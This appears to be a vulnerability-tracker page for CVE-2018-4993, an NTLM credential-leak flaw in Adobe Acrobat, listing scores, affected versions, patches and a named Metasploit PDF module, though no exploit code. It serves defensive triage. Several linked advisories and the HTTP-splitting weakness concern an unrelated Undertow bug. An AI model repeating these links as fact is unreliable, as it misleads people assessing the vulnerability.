Public exploit available
Public proof-of-concept or exploit code exists (ExploitDB / Metasploit / Nuclei).

CVE-2018-4993Sensitive Information Exposure in Adobe Acrobat DC

CWE-200Sensitive Information ExposureCWE-522Insufficiently Protected CredentialsCWE-113HTTP Request/Response Splitting15 documents9 sources
Severity
7.5HIGHNVD
NVD6.5GHSA6.1
EPSS
68.3%
top 1.39%
CISA KEV
Not in KEV
Exploit
PoC available
Public exploit / PoC exists
Affected products
3
Pdf-xchange EditorAdobe Acrobat DCAdobe Acrobat Reader DC
Timeline
PublishedJul 9
Latest updateMay 24

Description

Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft vulnerability. Successful exploitation could lead to information disclosure.

CVSS vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NExploitability: 3.9 | Impact: 3.6

Affected Packages3 packages

NVDadobe/acrobat_reader_dc15.006.3006015.006.30417+2
NVDadobe/acrobat_dc15.006.3006015.006.30417+2

Patches

Patch: helpx.adobe.comPatch: helpx.adobe.com

🔴Vulnerability Details

3
GHSA
GHSA-2pj4-mr9m-qwww: Tracker PDF-XChange Editor before 82022-05-24
GHSA
GHSA-4rxx-6c3r-g2p4: Adobe Acrobat and Reader versions 20182022-05-14
GHSA
Improper Neutralization of CRLF Sequences in HTTP Headers in Undertow2022-05-13

💥Exploits & PoCs

1
Metasploit
BADPDF Malicious PDF Creator

📋Vendor Advisories

1
Red Hat
undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)2018-04-25

🕵️Threat Intelligence

4
Sentinelone
Malicious PDFs | Revealing the Techniques Behind the Attacks2019-03-27
Tenable
Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)2018-11-14
Tenable
Adobe Patches Incomplete Fix for NTLM Credential Leaking Bug (CVE-2018-15979)2018-11-14
Zscaler
Zscaler protects against 38 new vulnerabilities for Adobe Fl

💬Community

2
Bugzilla
CVE-2018-1067 wildfly: undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993) [fedora-all]2018-06-19
Bugzilla
CVE-2018-1067 undertow: HTTP header injection using CRLF with UTF-8 Encoding (incomplete fix of CVE-2016-4993)2018-03-01